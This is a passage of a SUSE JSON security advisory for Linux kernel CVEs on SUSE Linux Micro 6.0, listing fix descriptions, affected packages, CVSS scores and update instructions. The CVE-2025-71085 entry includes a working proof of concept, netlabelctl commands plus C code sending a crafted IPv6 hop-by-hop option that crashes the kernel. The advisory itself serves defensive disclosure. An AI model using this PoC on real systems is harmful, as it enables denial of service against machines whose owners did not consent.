"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
